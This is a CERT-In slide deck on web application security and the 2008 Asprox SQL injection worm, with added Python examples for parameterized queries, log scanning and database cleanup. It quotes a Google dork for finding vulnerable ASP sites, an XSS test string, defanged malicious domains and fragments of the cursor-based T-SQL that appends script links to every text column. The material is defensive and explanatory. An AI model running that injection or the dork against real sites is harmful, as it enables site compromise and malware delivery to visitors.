Understanding Web Application Security Issues
1 Understanding Web Application Security Issues. Pankaj Sharma, January 30, 2009. Indian Computer Emergency Response Team (CERT-In), Department of Information Technology
2 Agenda: Introduction; What are Web Applications?; Three-layered web application model; Secure Architecture & Threats; Statistics of application attacks in 2008 (April, May, June); Case Study: Asprox; References; Q&A
3 Web Applications? A web application is a program developed to perform a specific function directly for the user or for another application program. Web applications include code that resides on the web servers, application servers, databases and backend systems of an organization. [Figure: client/server software; browser and web server communicating over HTTP/HTTPS]
4 Three-layered web application model: The first layer is normally a web browser or the user interface. The second layer is the content generation technology, such as Java servlets (JSP) or Active Server Pages (ASP). The third layer is the company database containing content (e.g., news) and customer data (e.g., usernames and passwords, social security numbers and credit card details).
5 Statistics of defacement in March 2008: In total 612 Indian websites were defaced during March
6 Vulnerabilities exploited for the defacements: Multiple Vulnerabilities in Apache HTTP Server CIAD; Cross Site Scripting Vulnerability in Apache mod_imap Module CIVN; Apache Tomcat SingleSignOn Cookie Information Disclosure Weakness CVE; phpMyAdmin Local Information Disclosure CVE; Apache Tomcat AJP Connector Information Disclosure CVE; Apache Tomcat Cross-Site Scripting CVE
7 Attack Trend: Mass SQL injection attacks and malicious JavaScript embedding on websites (March, April, May 2008). Various websites have been infected with a malicious JavaScript file (f**kjp DOT js). Remote attackers are launching SQL injection attacks against web servers running ASP and embedding a link (www DOT DOT net/f**kjp DOT js) to the malicious JavaScript file on these websites. When a user visits an infected website, the code is executed on the user's system. Upon execution it tries to exploit several known vulnerabilities on the victim system to download password-stealing malware. The downloaded malware tries to make outbound connections to IP address 61 DOT 188 DOT 39 DOT 175 on port
8 Attack Trend: It has also been reported that mass attacks were launched against websites running phpBB (PHP Bulletin Board) through IFrame injection, redirecting innocent users to malicious websites.
9 Attack Trend: Subsequently, mass IFrame and JavaScript injection attacks have been reported using malicious domains: www DOT nmidahena DOT com, www DOT nihaorr1 DOT com, www DOT aspder DOT com, haoliuliang DOT net, winzipices DOT cn, yl18 DOT net, www DOT bluell DOT cn, www DOT kisswow DOT com DOT cn, www DOT ririwow DOT cn, hxxp://updatead DOT com, hxxp://upgradead DOT com, hxxp://clsiduser DOT com and hxxp://dbdomaine DOT com.
10 Vulnerabilities exploited by the JavaScript file: Microsoft Data Access Components Code Execution Vulnerability (CIVN); Microsoft Windows Vector Markup Language Code Execution Vulnerability (CIVN); Microsoft Internet Explorer "daxctle.ocx" KeyFrame Memory Vulnerability (CIVN); Microsoft Internet Explorer WebViewFolderIcon Buffer Overflow Vulnerability (CIVN); RealPlayer Playlist Buffer Overflow Vulnerability (CIVN)
11 Countermeasures from CERT-In: Enable request validation by setting validateRequest="true" in the Page directive or in the configuration section. Input filtering: properly sanitize user input data. Comment out malicious code: any scripting content is to be safely commented out. Avoid cross-site scripting appended to URLs using special characters such as #, e.g. <script>alert(document.cookie)</script>. Output filtering: filter user data when it is sent back to the user's browser. Disable client-side scripting. Use signed scripting: implement signed scripting such that any script with an invalid or untrusted signature will not run automatically.
12 Other Countermeasures: Microsoft released an advisory on June 24, 2008 suggesting steps to mitigate the risk from SQL injection attacks on websites running ASP.NET. For details refer to the Microsoft Advisory: mspx. A free scanner named Scrawlr, developed by Hewlett Packard, can identify whether sites are susceptible to SQL injection. This tool and support for its use can be found at: gs/ spilabs/archive/2008/06/23/finding-sql-injection-withscrawlr. aspx
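The countermeasures on slides 11 and 12 (input filtering, output filtering, and the Microsoft guidance on SQL injection against ASP pages) are easier to reason about side by side in code. The following is an added example written for this page, not code from CERT-In or from the ASP sites in the case study; it uses an in-memory SQLite table as a stand-in for the SQL Server backend, and its rows and the "news"/"id" names are constructed. It goes one step beyond the slide's wording by showing parameter binding, which is the general form of keeping user data out of the statement text.

```python
import html
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's backend (sample rows, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news (title) VALUES (?)",
        [("Welcome",), ("Maintenance window",),
         # a row that already carries an injected tag, to show output filtering
         ('Notice<script src="x.js"></script>',)],
    )
    conn.commit()
    return conn


def lookup_unsafe(conn, user_id):
    """The vulnerable form: the raw request value is pasted into the SQL text,
    so whatever the client sends becomes part of the statement."""
    sql = "SELECT title FROM news WHERE id = " + user_id
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn, user_id):
    """Parameter binding: the value travels separately from the statement text,
    so it is compared as data and cannot change the query's structure."""
    return [row[0] for row in
            conn.execute("SELECT title FROM news WHERE id = ?", (user_id,))]


def validate_id(user_id):
    """Input filtering: a record id must be a string of digits, nothing else."""
    if not user_id.isdigit():
        raise ValueError("id must be a positive integer")
    return int(user_id)


def lookup_hardened(conn, user_id):
    """Validation first, then binding: junk is rejected early, the rest is bound."""
    return lookup_bound(conn, validate_id(user_id))


def render_title(title):
    """Output filtering: escape stored data before it goes back to the browser,
    so a tag that reached the database is displayed as text, not executed."""
    return "<h1>" + html.escape(title, quote=True) + "</h1>"


if __name__ == "__main__":
    conn = make_db()
    print("unsafe, tautology input:", lookup_unsafe(conn, "1 OR 1=1"))
    print("bound, same input:     ", lookup_bound(conn, "1 OR 1=1"))
    print("rendered stored row 3: ", render_title(lookup_bound(conn, 3)[0]))
```

With the tautology input the concatenated query returns every row, the bound query returns nothing, and the validating wrapper refuses the request before any SQL runs; the escaped rendering shows why output filtering still matters once a database has already been tampered with.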
13 Statistics of defacement in June 2008: In total 342 Indian websites were defaced during June
14 Vulnerabilities exploited for the defacements: Apache-SSL Authentication Bypass Vulnerability CIVN; phpMyAdmin Shared Host Remote Information Disclosure CVE; Apache Tomcat SingleSignOn Cookie Information Disclosure Weakness CVE; phpMyAdmin Local Information Disclosure CVE; Apache Tomcat Cross-Site Scripting CVE
15 Attack Trend: SQL Injection Worm (April, May, June 2008). An SQL injection worm is spreading in the wild by injecting JavaScript or IFrames into websites. The Asprox botnet is also launching the SQL injection attacks.
16 Attack Trend: Many websites have been found infected with such scripts.
17 Attack Trend: Websites injected with JavaScript are redirecting innocent visitors to the malicious website winzipices DOT cn, which hosts JavaScript files with numeric names such as 2.js and 4.js.
18 Attack Trend: The SQL injection worm seems to be infecting machines using vulnerable RealPlayer versions. Malicious domains involved in attacks with SQL worm activity are cnzz DOT com, 51 DOT la, 51la DOT ajiang DOT net, and bbs DOT jueduizuan DOT com
19 Case Study (asprox): The Database Security and Vulnerability Analysis Team of CERT-In thoroughly analyzed the attack and identified the vulnerabilities which were being exploited to compromise the website. After compromising the website, the attacker used the compromised host for further attacks over the Internet.
20 Case Study (asprox): Environment: Operating system: Windows Server; Web server: IIS; Web application: ASP; Method: GET
21 Case Study (asprox): Investigation: it was observed that this SQL injection attack was carried out against IIS web server sites running SQL Server as the backend. Tool used to attack: a sophisticated tool is used to scan the entire web for potentially weak sites running ASP.NET. This tool is called the Danmec/Asprox SQL Injection Attack Tool.
22 Case Study (asprox): Asprox initiates Google queries searching for vulnerable ASP sites with the following query string: inurl:.asp inurl: a=. It parses the results and initiates the SQL injection attack, injecting malicious JavaScript links into the back-end MS-SQL server database. If this is successful, the website will display the malicious JavaScript links in its output to clients. These links will force the user's browser to download other JavaScript code that will attempt to exploit browser flaws to install other Trojan software and perhaps steal user credentials.
23 Case Study (asprox)
24 Case Study (asprox): The attacker then loads the query string with encoded T-SQL.
25 Case Study (asprox) The input encoded T-SQL would look like: GET /home/vulnerable_site.asp D B D003D B C D003D D0 02B B B E006E D B D B B E006E D B D003D D F006E C B E006E D B B C D A002F002F C E006E F E006A E003C002F E B F006D F002E F A C F002E F006C D006E C F002E E D E E E D E E D E E E006E D D B D003D D B D003D E D002C E B C D C B D003D D B D B0 25
26 Case Study (asprox): After decoding, the SQL code looked like: varchar(8000); select src=" from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='u' and b.xtype=c.xtype and c.name='varchar'; This SQL code finds all fields of type VARCHAR from a JOIN between the sysobjects, syscolumns and systypes system tables in the database. The statement takes all rows from the sysobjects table with type U (user table) and matches those objects with columns of type varchar. Finally, for every such column it executes an update statement which appends the code shown above, pointing to the yl18.net site.
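The encoded request on slide 25 did not survive transcription, so here is an added example (my own code, not CERT-In's) of the step an incident responder performs on slide 26: pull requests carrying hex-encoded T-SQL out of IIS logs and decode them so the injected statement can be read. It assumes, from the alternating 00 bytes visible in the slide, that the hex blob is UTF-16LE text wrapped in CAST(0x... AS NVARCHAR); the two log lines, the page path and the encoded payload are all constructed for the example.

```python
import binascii
import re
from urllib.parse import unquote

# Constructed sample (not from the page): a short T-SQL snippet in the style of
# the decoded statement on slide 26, hex-encoded as UTF-16LE the way the worm did.
SAMPLE_PAYLOAD_SQL = ("DECLARE @T varchar(255);"
                      "SELECT a.name FROM sysobjects a WHERE a.xtype='u'")
SAMPLE_HEX = SAMPLE_PAYLOAD_SQL.encode("utf-16-le").hex().upper()

# Constructed IIS-style log lines: one clean request, one carrying the payload
# appended to a numeric parameter, as the case study describes.
SAMPLE_LOG_LINES = [
    "2008-06-01 10:15:02 GET /home/vulnerable_site.asp id=1 200",
    "2008-06-01 10:15:07 GET /home/vulnerable_site.asp "
    "id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + SAMPLE_HEX
    + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 200",
]

# A hex literal handed to CAST(... AS [N]VARCHAR) inside a query string is the
# signature of this attack family; legitimate ASP parameters never look like this.
HEX_CAST = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
SUSPECT_KEYWORDS = ("DECLARE", "CURSOR", "EXEC", "SYSOBJECTS", "SYSCOLUMNS", "UPDATE")


def decode_hex_sql(hex_text):
    """Turn the hex blob back into text. Assumption: UTF-16LE (NVARCHAR);
    if that fails, treat the bytes as single-byte text instead."""
    if len(hex_text) % 2:
        hex_text = "0" + hex_text
    raw = binascii.unhexlify(hex_text)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")


def inspect_request(line):
    """Return (decoded_sql, matched_keywords) for a suspicious log line, else None."""
    query = unquote(line)            # undo %20 and friends before matching
    match = HEX_CAST.search(query)
    if match is None:
        return None
    decoded = decode_hex_sql(match.group(1))
    upper = decoded.upper()
    hits = [kw for kw in SUSPECT_KEYWORDS if kw in upper]
    return decoded, hits


def scan_log(lines):
    """Run inspect_request over a log and keep only the flagged lines."""
    flagged = []
    for line in lines:
        result = inspect_request(line)
        if result is not None:
            flagged.append((line, result))
    return flagged


if __name__ == "__main__":
    for line, (sql, hits) in scan_log(SAMPLE_LOG_LINES):
        print("suspicious request:", line[:60] + "...")
        print("  decoded T-SQL:   ", sql)
        print("  keywords:        ", hits)
```

The same regular expression, used on its own, is a reasonable IIS log search term for slide 32's "review IIS logs for signs of previous exploits"; decoding the blob additionally tells the responder which tables and columns the statement went after.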
27 Case Study (asprox): Another variation of the same type of SQL code is given below, with a link to the JavaScript file 1.js. varchar(255); DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM WHILE (@@FETCH_STATUS = 0) BEGIN EXEC('update [' + '] set [' + '] = rtrim(convert(varchar,[' + ']))+ ''<script src= FETCH NEXT FROM END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor;
28 Case Study (asprox): The above SQL code uses table cursors to enumerate all tables on the MS SQL server and their columns of type ntext, text, nvarchar or varchar, where the table is a user table and not a system table. The code then uses a cursor while loop to iterate through the returned results, updating each table.column by concatenating its current value with an arbitrary value. The code converts the current data to varchar during concatenation to avoid any cast issues and removes any trailing spaces to the right of the field value. The cursor is deallocated after the update. So finally it finds all text fields in the database and adds a link to a malicious JavaScript file to each field. These JavaScript file links will force the user's browser to download other JavaScript code that will attempt to exploit browser flaws to install other Trojan software and perhaps steal user credentials.
29 Case Study (asprox): Identification of Attack. Identification requires that database administrators (DBAs) review all databases providing services to web applications. Review access controls and privileges granted to web application accounts; privileges should not exceed those specified by the application owner. Look for the presence of unexpected HTML tags in records of the database tables related to the application. Unexpected HTML tags in application table records may be an indicator that the online service has been compromised and that immediate action is required.
30 Case Study (asprox): Identification. Web administrators should review the server-side components of online services which access databases. Identify online service components with insufficient validation controls; validation controls ensure the data conforms to the expected format, size and value. Identify online service components which allow, or are vulnerable to, improper data conversions; data must be converted to its simplest form prior to being accepted for further processing.
31 Containment and Eradication (Case Study): The following actions can be taken to mitigate the security risk: Shut down the service until the system has fully recovered from the attack. Verify that the accounts used by the web application have the least possible privileges in the database. Implement strict database access controls to restrict online services to read-only access. Implement filters that will convert dangerous data into an inoffensive form (replace all unwanted HTML tags, if any, in the databases). Take the database offline or recover clean data from a backup. Monitoring tools for the web and database servers should be deployed.
32 Recommendations for Web Developers: Review the security of the web application; review online services security; review network security; review IIS logs and database tables for signs of previous exploits; review database security; perform vulnerability testing using specialized tools for online services, network and database security; implement application security best practices.
33 Recommendations for Database Administrators: Perform a security audit of all databases used by web servers. DBAs should particularly check for the presence of unexpected HTML tags: search all tables for unexpected HTML tags such as SCRIPT, IFRAME and FRAME.
34 Recommendations for Database Administrators: Review access controls and privileges for the web application. Review privileges for the following: SQL statements (SELECT, GRANT, UPDATE, DELETE, etc.); data definition language elements (CREATE, ALTER, etc.); stored procedures.
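Slides 29, 31 and 33 all come down to the same two DBA tasks: enumerate every text column in every user table and look for tags that should not be there, then strip the appended script link from the rows that carry it. The block below is an added example written for this page, not CERT-In's procedure or any vendor tool; it is the defender's mirror image of the cursor loop on slide 27. It uses SQLite in place of MS SQL Server (so the catalogue is sqlite_master and PRAGMA table_info rather than sysobjects/syscolumns or sys.tables/sys.columns), and the two tables, their rows and the malicious.example hostname are constructed sample data.

```python
import re
import sqlite3

# Identification: any of the tags slide 33 names, anywhere in a stored value.
INJECTED_TAG = re.compile(r"<\s*(script|iframe|frame)\b", re.IGNORECASE)
# Eradication: the specific shape the worm appends, anchored at the end of the value.
APPENDED_SCRIPT = re.compile(
    r"""<script\s+src=["']?[^>"']*["']?\s*>\s*</script>\s*$""", re.IGNORECASE)


def make_sample_db():
    """Constructed sample database (not from the page): two user tables, one of
    which has had a script link appended to every text field, as the cursor loop does."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, logins INTEGER)")
    tag = '<script src="http://malicious.example/1.js"></script>'   # constructed URL
    conn.executemany("INSERT INTO news (title, body) VALUES (?, ?)",
                     [("Welcome" + tag, "First post" + tag),
                      ("Maintenance" + tag, "Down at 22:00" + tag)])
    conn.executemany("INSERT INTO users (name, logins) VALUES (?, ?)",
                     [("alice", 3), ("bob", 7)])
    conn.commit()
    return conn


def text_columns(conn):
    """Walk the catalogue: every user table, every character-typed column."""
    tables = [row[0] for row in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, col, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if "CHAR" in ctype.upper() or "TEXT" in ctype.upper():
                yield table, col


def find_injected(conn):
    """Identification: rows per (table, column) whose value contains an unexpected tag."""
    findings = {}
    for table, col in text_columns(conn):
        hits = sum(1 for (value,) in conn.execute(f'SELECT "{col}" FROM "{table}"')
                   if value is not None and INJECTED_TAG.search(value))
        if hits:
            findings[(table, col)] = hits
    return findings


def strip_appended_script(conn):
    """Eradication: remove the appended script link from affected fields.
    Returns the number of rows changed. Rows are fetched before updating so the
    UPDATE never races the SELECT it came from."""
    changed = 0
    for table, col in find_injected(conn):
        rows = conn.execute(f'SELECT rowid, "{col}" FROM "{table}"').fetchall()
        for rowid, value in rows:
            cleaned = APPENDED_SCRIPT.sub("", value)
            if cleaned != value:
                conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                             (cleaned, rowid))
                changed += 1
    conn.commit()
    return changed


if __name__ == "__main__":
    db = make_sample_db()
    print("before:", find_injected(db))
    print("rows cleaned:", strip_appended_script(db))
    print("after: ", find_injected(db))
```

Run find_injected first and keep its output as evidence; the cleanup only touches values that end in the exact appended pattern, so data that legitimately contains markup elsewhere is left alone. As slide 31 says, restoring clean data from a backup is the better option where one exists, and the cleanup should in any case run against a copy or after a fresh backup.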
35 Secure Architecture
36 References
37 Thanks
ASP.NET MVC Secure Coding 4-Day hands on Course Course Syllabus Course description ASP.NET MVC Secure Coding 4-Day hands on Course Secure programming is the best defense against hackers. This multilayered
More informationSecurity Awareness For Website Administrators. State of Illinois Central Management Services Security and Compliance Solutions
Security Awareness For Website Administrators State of Illinois Central Management Services Security and Compliance Solutions Common Myths Myths I m a small target My data is not important enough We ve
More informationWHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6 Ensuring compliance for PCI DSS 6.5 and 6.6 Page 2 Overview Web applications and the elements surrounding them
More informationMetasploit The Elixir of Network Security
Metasploit The Elixir of Network Security Harish Chowdhary Software Quality Engineer, Aricent Technologies Shubham Mittal Penetration Testing Engineer, Iviz Security And Your Situation Would Be Main Goal
More informationSecure Web Development Teaching Modules 1. Threat Assessment
Secure Web Development Teaching Modules 1 Threat Assessment Contents 1 Concepts... 1 1.1 Software Assurance Maturity Model... 1 1.2 Security practices for construction... 3 1.3 Web application security
More informationTo Cache a Thief Using database caches to detect SQL injection attacks. Kevvie Fowler, CISSP, GCFA Gold, MCTS, MCDBA, MCSD, MCSE
To Cache a Thief Using database caches to detect SQL injection attacks Kevvie Fowler, CISSP, GCFA Gold, MCTS, MCDBA, MCSD, MCSE About me Day job: Director Security Services, TELUS backed by Emergis Night
More informationWEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
More informationPenetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com
More informationGuidelines for Website Security and Security Counter Measures for e-e Governance Project
and Security Counter Measures for e-e Governance Project Mr. Lalthlamuana PIO, DoICT Background (1/8) Nature of Cyber Space Proliferation of Information Technology Rapid Growth in Internet Increasing Online
More informationAnnex B - Content Management System (CMS) Qualifying Procedure
Page 1 DEPARTMENT OF Version: 1.5 Effective: December 18, 2014 Annex B - Content Management System (CMS) Qualifying Procedure This document is an annex to the Government Web Hosting Service (GWHS) Memorandum
More informationBank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM
Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM Agenda Introduction to Application Hacking Demonstration of Attack Tool Common Web Application Attacks Live Bank Hacking Demonstration
More informationColumbia University Web Application Security Standards and Practices. Objective and Scope
Columbia University Web Application Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Application Security Standards and Practices document establishes a baseline
More informationWeb Application Vulnerabilities and Avoiding Application Exposure
Web Application Vulnerabilities and Avoiding Application Exposure The introduction of BIG-IP Application Security Manager (ASM) version 9.4.2 marks a major step forward. BIG-IP ASM now offers more features
More informationWeb Application Security
Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching
More informationUniversity of Wisconsin Platteville SE411. Senior Seminar. Web System Attacks. Maxwell Friederichs. April 18, 2013
University of Wisconsin Platteville SE411 Senior Seminar Web System Attacks Maxwell Friederichs April 18, 2013 Abstract 1 Data driven web applications are at the cutting edge of technology, and changing
More informationWeb application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
More informationWeb Application Security Guidelines for Hosting Dynamic Websites on NIC Servers
Web Application Security Guidelines for Hosting Dynamic Websites on NIC Servers The Website can be developed under Windows or Linux Platform. Windows Development should be use: ASP, ASP.NET 1.1/ 2.0, and
More informationDetection of SQL Injection and XSS Vulnerability in Web Application
International Journal of Engineering and Applied Sciences (IJEAS) ISSN: 2394-3661, Volume-2, Issue-3, March 2015 Detection of SQL Injection and XSS Vulnerability in Web Application Priti Singh, Kirthika
More informationSample Report. Security Test Plan. Prepared by Security Innovation
Sample Report Security Test Plan Prepared by Security Innovation Table of Contents 1.0 Executive Summary... 3 2.0 Introduction... 3 3.0 Strategy... 4 4.0 Deliverables... 4 5.0 Test Cases... 5 Automation...
More informationCS 558 Internet Systems and Technologies
CS 558 Internet Systems and Technologies Dimitris Deyannis deyannis@csd.uoc.gr 881 Heat seeking Honeypots: Design and Experience Abstract Compromised Web servers are used to perform many malicious activities.
More informationSimon Fraser University. Web Security. Dr. Abhijit Sen CMPT 470
Web Security Dr. Abhijit Sen 95% of web apps have Vulnerabilities Cross-site scripting (80 per cent) SQL injection (62 per cent) Parameter tampering (60 per cent) http://www.vnunet.com/vnunet/news/2124247/web-applicationswide-open-hackers
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationCross Site Scripting Prevention
Project Report CS 649 : Network Security Cross Site Scripting Prevention Under Guidance of Prof. Bernard Menezes Submitted By Neelamadhav (09305045) Raju Chinthala (09305056) Kiran Akipogu (09305074) Vijaya
More informationTop Ten Web Attacks. Saumil Shah Net-Square. BlackHat Asia 2002, Singapore
Top Ten Web Attacks Saumil Shah Net-Square BlackHat Asia 2002, Singapore TodayÕs battleground Ð the Web Web sites and web applications rapidly growing. Complex business applications are now delivered over
More information